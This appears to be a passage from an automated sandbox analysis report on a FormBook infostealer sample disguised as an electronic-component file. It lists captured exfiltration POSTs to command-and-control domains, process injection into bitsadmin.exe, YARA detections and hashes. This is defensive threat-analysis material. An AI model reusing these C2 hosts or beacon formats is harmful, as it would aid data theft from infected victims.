Jan 16, 2025 09:25:23.699177027 CET	10858	OUT	POST /6qnn/ HTTP/1.1 Host: www.boldjourn.website Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Content-Length: 10302 Cache-Control: no-cache Connection: close Origin: http://www.boldjourn.website Referer: http://www.boldjourn.website/6qnn/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1 Data Raw: 42 58 63 38 56 3d 75 62 4c 69 75 6d 51 75 70 4c 45 46 50 52 6f 74 66 4f 76 6c 39 73 72 53 2f 68 58 51 6d 4a 62 30 64 4c 30 52 46 62 50 73 4d 49 64 45 48 37 58 68 74 56 78 2b 4c 38 4f 49 35 38 69 45 62 54 32 48 7a 48 4d 6b 43 76 6d 51 32 4c 6d 5a 71 73 32 52 47 48 34 34 2f 6a 47 58 59 70 6b 4a 42 48 66 6b 44 65 66 6c 4f 53 66 61 43 55 71 4f 75 6f 48 69 79 4a 72 4d 2f 53 53 30 6f 39 65 38 67 31 76 77 47 6f 33 50 5a 74 71 4a 4d 7a 56 59 52 47 34 33 37 5a 44 74 58 48 49 59 77 37 63 6b 69 59 36 32 4d 4b 4d 43 4c 64 76 45 70 62 6a 6d 53 56 4e 42 47 54 41 78 58 68 56 76 6e 49 66 39 47 38 34 4b 37 30 42 44 4d 67 79 4b 4b 37 44 76 2f 67 49 79 63 74 6d 4a 63 32 56 4d 4a 66 69 56 54 6c 46 6d 37 73 4d 67 57 69 36 73 2b 5a 6f 49 62 57 46 5a 35 66 46 4c 68 37 4b 35 48 67 2b 44 31 50 72 55 2f 58 7a 2f 79 78 35 38 52 68 30 54 79 70 4d 5a 4a 31 4a 37 5a 55 76 5a 47 79 74 77 35 42 69 77 4b 58 46 35 4e 48 45 45 42 42 45 6b 62 43 51 4d 57 61 34 6b 41 76 42 38 66 74 78 79 4b 58 38 65 76 42 31 35 32 2f 45 61 32 72 6e 36 [TRUNCATED] Data Ascii: BXc8V=ubLiumQupLEFPRotfOvl9srS/hXQmJb0dL0RFbPsMIdEH7XhtVx+L8OI58iEbT2HzHMkCvmQ2LmZqs2RGH44/jGXYpkJBHfkDeflOSfaCUqOuoHiyJrM/SS0o9e8g1vwGo3PZtqJMzVYRG437ZDtXHIYw7ckiY62MKMCLdvEpbjmSVNBGTAxXhVvnIf9G84K70BDMgyKK7Dv/gIyctmJc2VMJfiVTlFm7sMgWi6s+ZoIbWFZ5fFLh7K5Hg+D1PrU/Xz/yx58Rh0TypMZJ1J7ZUvZGytw5BiwKXF5NHEEBBEkbCQMWa4kAvB8ftxyKX8evB152/Ea2rn6kr2osXwuWV3MAEnX/JjULH+o8hN2DCKUCu+/yDRvpDXPQKRCx21X/rw7SYD+Z8zmBZrDdVUIy5ggkL9kpP0KpyZZnG9qT2ewk3bIs+wKkQ7nLX33JqYpdxkMdmSYdlBXDEi0FbgIBJlH3uSqongleaOmWOW4hFZDYXT2nXzCPb3/rm6TNsvSrNIK1a2TthAzaY+x7bDINY5/vtvz8vBp/+wtFlEkyKpEHIO+wqx1Mtvfc/g4KvQa8ALTtw4DxPoER1BefPIi38REcsKX9umirg4V2BJAJz7VvYcICjTtWHdNs216Efy2eyS/TcdO5uKztShdeSF6/h6Tvvd5JrGODmzomj1ehnp07xywtlR2GvrJmp/th6hLvpDxuG3QHzYbhOLR2IMXelF/mDnw/INQ6yApdSFTm880R/djJViWjesLrEloB0PoJAmSCypEK/q9v8BwBhTtVDqZHecfW+yHXnM/tC8AYNLUKme+0r8NdEr+mtxutPUTmO8kjE4vYacKfZf3u6ZOc5d4JLOfAyuDIjjX6EccLnhBgJnnbxvpOpD8zQsMPgohmO9p4vcnlGnJfBiqjeM/DxRCOV4LZJ3UJHogCreXLKZFgrEdsF5XkAECccUC2sEGsRr2rMRjG8iIR5fh5FNuzYwBccnXpP63E39WTPWWdUBq4q [TRUNCATED]
Jan 16, 2025 09:25:24.298782110 CET	533	IN	HTTP/1.1 404 Not Found Date: Thu, 16 Jan 2025 08:25:24 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	50031	209.74.64.189	80	5600	C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 09:25:26.240880966 CET	486	OUT	GET /6qnn/?BXc8V=jZjCtW5Z35UjZn8TZsrAhfuPzAvLvIn1UqsIYqvINL5GRqKd5l5cN7nY2f+SbBmC2WETDruk6ZGN6IqYT24Zv1a8PLIHAmXFEvfhPzClF16HpP7M54iZiSM=&f898=D4YHodiH3rXTfZ HTTP/1.1 Host: www.boldjourn.website Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1
Jan 16, 2025 09:25:26.835616112 CET	548	IN	HTTP/1.1 404 Not Found Date: Thu, 16 Jan 2025 08:25:26 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	50032	160.25.166.123	80	5600	C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 09:25:32.345748901 CET	729	OUT	POST /5blw/ HTTP/1.1 Host: www.rpa.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Content-Length: 202 Cache-Control: no-cache Connection: close Origin: http://www.rpa.asia Referer: http://www.rpa.asia/5blw/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1 Data Raw: 42 58 63 38 56 3d 4c 75 72 77 70 78 64 48 46 6e 41 55 36 4b 34 41 68 4d 69 33 44 6a 41 31 73 79 71 38 39 43 75 62 41 59 6c 6f 70 68 54 54 34 7a 71 70 42 48 42 61 54 69 72 74 69 63 72 73 79 45 64 59 63 36 62 4e 4a 66 30 72 6c 58 61 64 75 68 39 51 77 45 7a 44 46 4e 73 4d 59 49 56 4d 47 77 79 78 47 64 54 48 56 6a 6c 45 46 59 4a 59 6b 6d 78 4f 64 68 66 53 53 42 46 2f 64 4e 56 48 50 4f 7a 55 47 39 55 64 56 73 79 44 2f 4b 46 69 43 2f 64 68 44 48 37 54 75 58 34 43 54 2f 48 6a 4b 42 61 79 6d 54 78 78 35 77 49 59 72 68 79 6f 6a 39 4d 79 4c 69 69 39 44 52 73 58 4f 6b 76 38 6d 78 6d 6d 65 73 32 4b 58 67 3d 3d Data Ascii: BXc8V=LurwpxdHFnAU6K4AhMi3DjA1syq89CubAYlophTT4zqpBHBaTirticrsyEdYc6bNJf0rlXaduh9QwEzDFNsMYIVMGwyxGdTHVjlEFYJYkmxOdhfSSBF/dNVHPOzUG9UdVsyD/KFiC/dhDH7TuX4CT/HjKBaymTxx5wIYrhyoj9MyLii9DRsXOkv8mxmmes2KXg==
Jan 16, 2025 09:25:33.280035019 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 16 Jan 2025 08:25:33 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Jan 16, 2025 09:25:33.280047894 CET	253	IN	Data Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	50033	160.25.166.123	80	5600	C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 09:25:34.897540092 CET	749	OUT	POST /5blw/ HTTP/1.1 Host: www.rpa.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Content-Length: 222 Cache-Control: no-cache Connection: close Origin: http://www.rpa.asia Referer: http://www.rpa.asia/5blw/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1 Data Raw: 42 58 63 38 56 3d 4c 75 72 77 70 78 64 48 46 6e 41 55 34 71 49 41 6a 76 61 33 45 44 41 30 6e 53 71 38 79 69 75 66 41 59 70 6f 70 6c 44 44 34 41 4f 70 42 6d 52 61 53 67 44 74 72 4d 72 73 39 6b 64 58 42 71 62 53 4a 66 6f 4a 6c 56 65 64 75 68 70 51 77 46 44 44 45 36 41 50 5a 59 55 71 4f 51 79 33 5a 74 54 48 56 6a 6c 45 46 5a 70 2b 6b 6d 5a 4f 64 78 50 53 53 67 46 38 55 74 56 45 49 4f 7a 55 43 39 55 5a 56 73 7a 6d 2f 4c 49 46 43 38 70 68 44 43 48 54 75 47 34 44 61 2f 48 6c 4f 42 62 4f 75 53 59 6f 39 51 38 52 72 69 2f 48 38 50 4d 7a 4b 6b 76 6e 53 67 4e 41 63 6b 4c 50 37 32 76 53 54 76 4c 44 4d 72 4a 65 56 6f 55 53 6a 6d 4a 30 42 49 43 30 54 6c 49 63 30 4a 41 3d Data Ascii: BXc8V=LurwpxdHFnAU4qIAjva3EDA0nSq8yiufAYpoplDD4AOpBmRaSgDtrMrs9kdXBqbSJfoJlVeduhpQwFDDE6APZYUqOQy3ZtTHVjlEFZp+kmZOdxPSSgF8UtVEIOzUC9UZVszm/LIFC8phDCHTuG4Da/HlOBbOuSYo9Q8Rri/H8PMzKkvnSgNAckLP72vSTvLDMrJeVoUSjmJ0BIC0TlIc0JA=
Jan 16, 2025 09:25:35.816458941 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 16 Jan 2025 08:25:35 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Jan 16, 2025 09:25:35.816476107 CET	253	IN	Data Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod

Target ID:	0
Start time:	03:22:29
Start date:	16/01/2025
Path:	C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe"
Imagebase:	0x730000
File size:	945'152 bytes
MD5 hash:	6E482564396BB10F5AFB4244E505C3E6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:22:46
Start date:	16/01/2025
Path:	C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe"
Imagebase:	0xc00000
File size:	945'152 bytes
MD5 hash:	6E482564396BB10F5AFB4244E505C3E6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2276189498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2276722825.0000000001600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2278015136.0000000002520000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:23:22
Start date:	16/01/2025
Path:	C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe"
Imagebase:	0x270000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3525237052.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	03:23:23
Start date:	16/01/2025
Path:	C:\Windows\SysWOW64\bitsadmin.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\bitsadmin.exe"
Imagebase:	0xf90000
File size:	186'880 bytes
MD5 hash:	F57A03FA0E654B393BB078D1C60695F3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3525169174.0000000000C40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3523964569.00000000006A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3525280527.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	03:23:36
Start date:	16/01/2025
Path:	C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe"
Imagebase:	0x270000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3525202420.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	03:23:49
Start date:	16/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	4.1%
Total number of Nodes:	217
Total number of Limit Nodes:	12

Executed Functions

Function 07B56984 Relevance: 8.1, Strings: 6, Instructions: 625
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hjq, xrefs: 07B5953D
Hjq, xrefs: 07B59399
Hjq, xrefs: 07B5942C
Hjq, xrefs: 07B594B3
Hjq, xrefs: 07B595FB
xD1, xrefs: 07B58E11

Memory Dump Source

Source File: 00000000.00000002.1854631461.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b50000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: Hjq$Hjq$Hjq$Hjq$Hjq$xD1
API String ID: 0-3188436081
Opcode ID: 305688f18a0e918df7698b85f079f5f2aa1e86d7d32decd6a60541355632593f
Instruction ID: ac695318965b65aca8aaa72e034af918b984e5ee5113c1e61aafc6c53d9aad75
Opcode Fuzzy Hash: 305688f18a0e918df7698b85f079f5f2aa1e86d7d32decd6a60541355632593f
Instruction Fuzzy Hash: 3B3252B0E00218CFEB54DFA9C8547AEBBF2AF88300F1485A9D509AB355DF349D45CB91

Function 0B240AD0 Relevance: 4.0, Strings: 3, Instructions: 253
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`{1, xrefs: 0B240BF7
Tefq, xrefs: 0B240BD9
Tefq, xrefs: 0B240D70

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: Tefq$Tefq$`{1
API String ID: 0-895151107
Opcode ID: ef376fe41647b464f5b0d0816f8527cac6ff98a83e38ac577b9a867d94c94416
Instruction ID: 946449608cb458564ec88b7de74a970b3328cbc9e3145cab16ee6bca706c82b2
Opcode Fuzzy Hash: ef376fe41647b464f5b0d0816f8527cac6ff98a83e38ac577b9a867d94c94416
Instruction Fuzzy Hash: 9CB144B5E11248CFDB08CFA9C885ADEBBF2FF89300F14856AD915AB265D7346942CB50

Function 013312A0 Relevance: 2.8, Strings: 2, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Tefq, xrefs: 01331399
Tefq, xrefs: 01331572

Memory Dump Source

Source File: 00000000.00000002.1836309965.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: Tefq$Tefq
API String ID: 0-1395890369
Opcode ID: 573dee45f73a376ca77a830b8bad39c0ee7ad50c1938b26e08040badc54bbce9
Instruction ID: 52bc335a3ba5ac012ed5b1ac59390007063635830e7dc54fa1f9a31e94494c03
Opcode Fuzzy Hash: 573dee45f73a376ca77a830b8bad39c0ee7ad50c1938b26e08040badc54bbce9
Instruction Fuzzy Hash: 68B124B0E052598FCB48CFA9C880ADEFBF2FF89314F14946AD415AB269D7349902CF54

Function 01331330 Relevance: 2.7, Strings: 2, Instructions: 207
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Tefq, xrefs: 01331399
Tefq, xrefs: 01331572

Memory Dump Source

Source File: 00000000.00000002.1836309965.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: Tefq$Tefq
API String ID: 0-1395890369
Opcode ID: 31ee5aa559b0adda927bc4f73437abe562f917b5e63f376e0acf0c837d8cf9cd
Instruction ID: 81d6ca07c99209185d90c9473e1f9ddc8515257f92388705b140c121056ed837
Opcode Fuzzy Hash: 31ee5aa559b0adda927bc4f73437abe562f917b5e63f376e0acf0c837d8cf9cd
